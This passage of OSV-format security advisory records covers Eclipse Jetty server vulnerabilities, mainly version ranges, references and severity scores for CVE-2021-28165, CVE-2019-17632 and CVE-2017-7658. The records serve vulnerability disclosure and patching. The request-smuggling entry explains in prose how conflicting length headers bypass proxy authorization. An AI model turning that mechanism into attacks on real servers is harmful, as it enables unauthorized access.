"9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.17.v20190418", "9.4.18.v20190429", "9.4.19.v20190610", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.20.v20190813", "9.4.21.v20190926", "9.4.22.v20191022", "9.4.23.v20191118", "9.4.24.v20191120", "9.4.25.v20191220", "9.4.26.v20200117", "9.4.27.v20200227", "9.4.28.v20200408", "9.4.29.v20200521", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.30.v20200611", "9.4.31.v20200723", "9.4.32.v20200930", "9.4.33.v20201020", "9.4.34.v20201102", "9.4.35.v20201120", "9.4.36.v20210114", "9.4.37.v20210219", "9.4.38.v20210224", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-26vr-8j45-3r4w/GHSA-26vr-8j45-3r4w.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0" }, { "fixed": "10.0.2" } ] } ], "versions": [ "10.0.0", "10.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-26vr-8j45-3r4w/GHSA-26vr-8j45-3r4w.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0" }, { "fixed": "11.0.2" } ] } ], "versions": [ "11.0.0", "11.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-26vr-8j45-3r4w/GHSA-26vr-8j45-3r4w.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-26vr-8j45-3r4w" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28165" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc907ed7b089828364437de5ed57fa062330970dc1bc5cd214b711f77@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc6c43c3180c0efe00497c73dd374cd34b62036cb67987ad42c1f2dce@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc4dbc9907b0bdd634200ac90a15283d9c143c11af66e7ec72128d020@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc4779abc1cface47e956cf9f8910f15d79c24477e7b1ac9be076a825@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbd9a837a18ca57ac0d9b4165a6eec95ee132f55d025666fe41099f33@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbcd7b477df55857bb6cae21fcc4404683ac98aac1a47551f0dc55486@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbc075a4ac85e7a8e47420b7383f16ffa0af3b792b8423584735f369f@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbba0b02a3287e34af328070dd58f7828612f96e2e64992137f4dc63d@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbab9e67ec97591d063905bc7d4743e6a673f1bc457975fc0445ac97f@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb8f5a6ded384eb00608e6137e87110e7dd7d5054cc34561cb89b81af@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb66ed0b4bb74836add60dd5ddf9172016380b2aeefb7f96fe348537b@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb2d34abb67cdf525945fe4b821c5cdbca29a78d586ae1f9f505a311c@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb1624b9777a3070135e94331a428c6653a6a1edccd56fa9fb7a547f2@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb11a13e623218c70b9f2a2d0d122fdaaf905e04a2edcd23761894464@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb00345f6b1620b553d2cc1acaf3017aa75cea3776b911e024fa3b187@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raea6e820644e8c5a577f77d4e2044f8ab52183c2536b00c56738beef@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rae8bbc5a516f3e21b8a55e61ff6ad0ced03bdbd116d2170a3eed9f5c@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra9dd15ba8a4fb7e42c7fe948a6d6b3868fd6bbf8e3fb37fcf33b2cd0@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra50519652b0b7f869a14fbfb4be9758a29171d7fe561bb7e036e8449@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra21b3e6bd9669377139fe33fb46edf6fece3f31375bc42a0dcc964b2@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra210e38ae0bf615084390b26ba01bb5d66c0a76f232277446ae0948a@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9fae5a4087d9ed1c9d4f0c7493b6981a4741cfb4bebb2416da638424@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9db72e9c33b93eba45a214af588f1d553839b5c3080fc913854a49ab@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9b793db9f395b546e66fb9c44fe1cd75c7755029e944dfee31b8b779@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9974f64723875052e02787b2a5eda689ac5247c71b827d455e5dc9a6@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4abbd760d24bab2b8f1294c5c9216ae915100099c4391ad64e9ae38b@%3Cdev.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-4949" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210611-0006" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfd3ff6e66b6bbcfb2fefa9f5a20328937c0369b2e142e3e1c6774743@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfc9f51b4e21022b3cd6cb6f90791a6a6999560212e519b5f09db0aed@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf99f9a25ca24fe519c9346388f61b5b3a09be31b800bf37f01473ad7@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf6de4c249bd74007f5f66f683c110535f46e719d2f83a41e8faf295f@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1b02dfccd27b8bbc3afd119b212452fa32e9ed7d506be9357a3a7ec@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ree1895a256a9db951e0d97a76222909c2e1f28c1a3d89933173deed6@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re6614b4fe7dbb945409daadb9e1cc73c02383df68bf9334736107a6e@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re577736ca7da51952c910b345a500b7676ea9931c9b19709b87f292b@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re3a1617d16a7367f767b8209b2151f4c19958196354b39568c532f26@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re0545ecced2d468c94ce4dcfa37d40a9573cc68ef5f6839ffca9c1c1@%3Ccommits.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdfe5f1c071ba9dadba18d7fb0ff13ea6ecb33da624250c559999eaeb@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdf4fe435891e8c35e70ea5da033b4c3da78760f15a8c4212fad89d9f@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdde34d53aa80193cda016272d61e6749f8a9044ccb37a30768938f7e@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdbf2a2cd1800540ae50dd78b57411229223a6172117d62b8e57596aa@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd9ea411a58925cc82c32e15f541ead23cb25b4b2d57a2bdb0341536e@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd7c8fb305a8637480dc943ba08424c8992dccad018cd1405eb2afe0e@%3Cdev.ignite.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd755dfe5f658c42704540ad7950cebd136739089c3231658e398cf38@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd6c1eb9a8a94b3ac8a525d74d792924e8469f201b77e1afcf774e7a6@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd24d8a059233167b4a5aebda4b3534ca1d86caa8a85b10a73403ee97@%3Ccommits.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0471252aeb3384c3cfa6d131374646d4641b80dd313e7b476c47a9c@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcdea97f4d3233298296aabc103c9fcefbf629425418c2b69bb16745f@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4a66bfbf62281e31bc1345ebecbfd96f35199eecd77bfe4e903e906f@%3Cissues.ignite.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4891d45625cc522fe0eb764ac50d48bcca9c0db4805ea4a998d4c225@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r47a7542ab61da865fff3db0fe74bfe76c89a37b6e6d2c2a423f8baee@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r411d75dc6bcefadaaea246549dd18e8d391a880ddf28a796f09ce152@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r401b1c592f295b811608010a70792b11c91885b72af9f9410cffbe35@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r40136c2010fccf4fb2818a965e5d7ecca470e5f525c232ec5b8eb83a@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r33eb3889ca0aa12720355e64fc2f8f1e8c0c28a4d55b3b4b8891becb@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r31f591a0deac927ede8ccc3eac4bb92697ee2361bf01549f9e3440ca@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2f2d9c3b7cc750a6763d6388bcf5db0c7b467bd8be6ac4d6aea4f0cf@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2ea2f0541121f17e470a0184843720046c59d4bde6d42bf5ca6fad81@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2afc72af069a7fe89ca2de847f3ab3971cb1d668a9497c999946cd78@%3Ccommits.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r23785214d47673b811ef119ca3a40f729801865ea1e891572d15faa6@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r17e26cf9a1e3cbc09522d15ece5d7c7a00cdced7641b92a22a783287@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r111f1ce28b133a8090ca4f809a1bdf18a777426fc058dc3a16c39c66@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0f02034a33076fd7243cf3a8807d2766e373f5cb2e7fd0c9a78f97c4@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0cd1a5e3f4ad4770b44f8aa96572fc09d5b35bec149c0cc247579c42@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0bf3aa065abd23960fc8bdc8090d6bc00d5e391cf94ec4e1f4537ae3@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0a4797ba6ceea8074f47574a4f3cc11493d514c1fab8203ebd212add@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0a241b0649beef90d422b42a26a2470d336e59e66970eafd54f9c3e2@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0841b06b48324cfc81325de3c05a92e53f997185f9d71ff47734d961@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r077b76cafb61520c14c87c4fc76419ed664002da0ddac5ad851ae7e7@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r06d54a297cb8217c66e5190912a955fb870ba47da164002bf2baffe5@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r05db8e0ef01e1280cc7543575ae0fa1c2b4d06a8b928916ef65dd2ad@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r03ca0b69db1e3e5f72fe484b71370d537cd711cbf334e2913332730a@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r002258611ed0c35b82b839d284b43db9dcdec120db8afc1c993137dc@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r942f4a903d0abb25ac75c592e57df98dea51350e8589269a72fd7913@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r940f15db77a96f6aea92d830bc94d8d95f26cc593394d144755824da@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r90327f55db8f1d079f9a724aabf1f5eb3c00c1de49dc7fd04cad1ebc@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r83453ec252af729996476e5839d0b28f07294959d60fea1bd76f7d81@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r81748d56923882543f5be456043c67daef84d631cf54899082058ef1@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7c40fb3a66a39b6e6c83b0454bc6917ffe6c69e3131322be9c07a1da@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7bf7004c18c914fae3d5a6a0191d477e5b6408d95669b3afbf6efa36@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r780c3c210a05c5bf7b4671303f46afc3fe56758e92864e1a5f0590d0@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r769155244ca2da2948a44091bb3bb9a56e7e1c71ecc720b8ecf281f0@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r746434be6abff9ad321ff54ecae09e1f09c1c7c139021f40a5774090@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r72bf813ed4737196ea3ed26494e949577be587fd5939fe8be09907c7@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7189bf41cb0c483629917a01cf296f9fbdbda3987084595192e3845d@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r71031d0acb1de55c9ab32f4750c50ce2f28543252e887ca03bd5621e@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6f256a1d15505f79f4050a69bb8f27b34cb353604dd2f765c9da5df7@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ce2907b2691c025250ba010bc797677ef78d5994d08507a2e5477c9@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6b070441871a4e6ce8bb63e190c879bb60da7c5e15023de29ebd4f9f@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ac9e263129328c0db9940d72b4a6062e703c58918dd34bd22cdf8dd@%3Cissues.ignite.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r694e57d74fcaa48818a03c282aecfa13ae68340c798dfcb55cb7acc7@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r65daad30d13f7c56eb5c3d7733ad8dddbf62c469175410777a78d812@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6535b2beddf0ed2d263ab64ff365a5f790df135a1a2f45786417adb7@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r64ff94118f6c80e6c085c6e2d51bbb490eaefad0642db8c936e4f0b7@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5f172f2dd8fb02f032ef4437218fd4f610605a3dd4f2a024c1e43b94@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5d1f16dca2e010193840068f1a1ec17b7015e91acc646607cbc0a4da@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5b3693da7ecb8a75c0e930b4ca26a5f97aa0207d9dae4aa8cc65fe6b@%3Cissues.ignite.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r56e5568ac73daedcb3b5affbb4b908999f03d3c1b1ada3920b01e959@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r520c56519b8820955a86966f499e7a0afcbcf669d6f7da59ef1eb155@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4b1fef117bccc7f5fd4c45fd2cabc26838df823fe5ca94bc42a4fd46@%3Cissues.ignite.apache.org%3E" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/04/20/3" } ], "database_specific": { "cwe_ids": [ "CWE-400", "CWE-551", "CWE-755" ], "github_reviewed": true, "github_reviewed_at": "2021-04-02T23:02:13Z", "nvd_published_at": "2021-04-01T15:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5h9j-q6j2-253f", "published": "2019-12-02T18:13:28Z", "modified": "2024-02-16T08:16:10.159901Z", "aliases": [ "CVE-2019-17632" ], "summary": "Unescaped exception messages in error responses in Jetty", "details": "In Eclipse Jetty versions 9.4.21.v20190926, 9.4.22.v20191022, and 9.4.23.v20191118, the generation of default unhandled Error response content (in text/html and text/json Content-Type) does not escape Exception messages in stacktraces included in error output.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.21.v20190926" }, { "fixed": "9.4.24.v20191120" } ] } ], "versions": [ "9.4.21.v20190926", "9.4.22.v20191022", "9.4.23.v20191118" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/12/GHSA-5h9j-q6j2-253f/GHSA-5h9j-q6j2-253f.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.22.v20191022" }, { "fixed": "9.4.24.v20191120" } ] } ], "versions": [ "9.4.22.v20191022", "9.4.23.v20191118" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/12/GHSA-5h9j-q6j2-253f/GHSA-5h9j-q6j2-253f.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.23.v20191118" }, { "fixed": "9.4.24.v20191120" } ] } ], "versions": [ "9.4.23.v20191118" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/12/GHSA-5h9j-q6j2-253f/GHSA-5h9j-q6j2-253f.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-17632" }, { "type": "WEB", "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=553443" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SAITZ27GKPD2CCNHGT2VBT4VWIBUJJNS" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2019-12-02T01:09:14Z", "nvd_published_at": "2019-11-25T22:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6x9x-8qw9-9pp6", "published": "2018-10-19T16:16:38Z", "modified": "2024-02-16T08:16:22.832624Z", "aliases": [ "CVE-2017-7658" ], "summary": "Jetty vulnerable to authorization bypass due to inconsistent HTTP request handling (HTTP Request Smuggling)", "details": "Eclipse Jetty Server versions 9.2.x and older, 9.3.x (all non HTTP/1.x configurations), and 9.4.x (all HTTP/1.x configurations), are vulnerable to HTTP Request Smuggling when presented with two content-lengths headers, allowing authorization bypass. When presented with a content-length and a chunked encoding header, the content-length was ignored (as per RFC 2616). If an intermediary decides on the shorter length, but still passes on the longer body, then body content could be interpreted by Jetty as a pipelined request. If the intermediary is imposing authorization, the fake pipelined request bypasses that authorization.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "9.2.25.v20180606" } ] } ], "versions": [ "7.0.0.M0", "7.0.0.M1", "7.0.0.M2", "7.0.0.M3", "7.0.0.M4", "7.0.0.RC0", "7.0.0.RC1", "7.0.0.RC2", "7.0.0.RC3", "7.0.0.RC4", "7.0.0.RC5", "7.0.0.RC6", "7.0.0.v20091005", "7.0.1.v20091125", "7.0.2.RC0", "7.0.2.v20100331", "7.1.0.RC0", "7.1.0.RC1", "7.1.0.v20100505", "7.1.1.v20100517", "7.1.2.v20100523", "7.1.3.v20100526", "7.1.4.v20100610", "7.1.5.v20100705", "7.1.6.v20100715", "7.2.0.RC0", "7.2.0.v20101020", "7.2.1.v20101111", "7.2.2.v20101205", "7.3.0.v20110203", "7.3.1.v20110307", "7.4.0.RC0", "7.4.0.v20110414", "7.4.1.v20110513", "7.4.2.v20110526", "7.4.3.v20110701", "7.4.4.v20110707", "7.4.5.v20110725", "7.5.0.RC0", "7.5.0.RC1", "7.5.0.RC2", "7.5.0.v20110901", "7.5.1.v20110908", "7.5.2.v20111006", "7.5.3.v20111011", "7.5.4.v20111024", "7.6.0.RC0", "7.6.0.RC1", "7.6.0.RC2", "7.6.0.RC3", "7.6.0.RC4", "7.6.0.RC5", "7.6.0.v20120127", "7.6.1.v20120215", "7.6.10.v20130312", "7.6.11.v20130520", "7.6.12.v20130726", "7.6.13.v20130916", "7.6.14.v20131031", "7.6.15.v20140411", "7.6.16.v20140903", "7.6.17.v20150415", "7.6.18.v20150929", "7.6.19.v20160209", "7.6.2.v20120308", "7.6.20.v20160902", "7.6.21.v20160908", "7.6.3.v20120416", "7.6.4.v20120524", "7.6.5.v20120716", "7.6.6.v20120903", "7.6.7.v20120910", "7.6.8.v20121106", "7.6.9.v20130131", "8.0.0.M0", "8.0.0.M1", "8.0.0.M2", "8.0.0.M3", "8.0.0.RC0", "8.0.0.v20110901", "8.0.1.v20110908", "8.0.2.v20111006", "8.0.3.v20111011", "8.0.4.v20111024", "8.1.0.RC0", "8.1.0.RC1", "8.1.0.RC2", "8.1.0.RC4", "8.1.0.RC5", "8.1.0.v20120127", "8.1.1.v20120215", "8.1.10.v20130312", "8.1.11.v20130520", "8.1.12.v20130726", "8.1.13.v20130916", "8.1.14.v20131031", "8.1.15.v20140411", "8.1.16.v20140903", "8.1.17.v20150415", "8.1.18.v20150929", "8.1.19.v20160209", "8.1.2.v20120308", "8.1.20.v20160902", "8.1.21.v20160908", "8.1.22.v20160922", "8.1.3.v20120416", "8.1.4.v20120524", "8.1.5.v20120716", "8.1.6.v20120903", "8.1.7.v20120910", "8.1.8.v20121106", "8.1.9.v20130131", "8.2.0.v20160908", "9.0.0.M0", "9.0.0.M1", "9.0.0.M2", "9.0.0.M3", "9.0.0.M4", "9.0.0.M5", "9.0.0.RC0", "9.0.0.RC1", "9.0.0.RC2", "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", "9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", "9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.22.v20170606", "9.2.23.v20171218", "9.2.24.v20180105", "9.2.3.v20140905", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-6x9x-8qw9-9pp6/GHSA-6x9x-8qw9-9pp6.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.3.0" }, { "fixed": "9.3.24.v20180605" } ] } ], "versions": [ "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.3.v20150827", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", 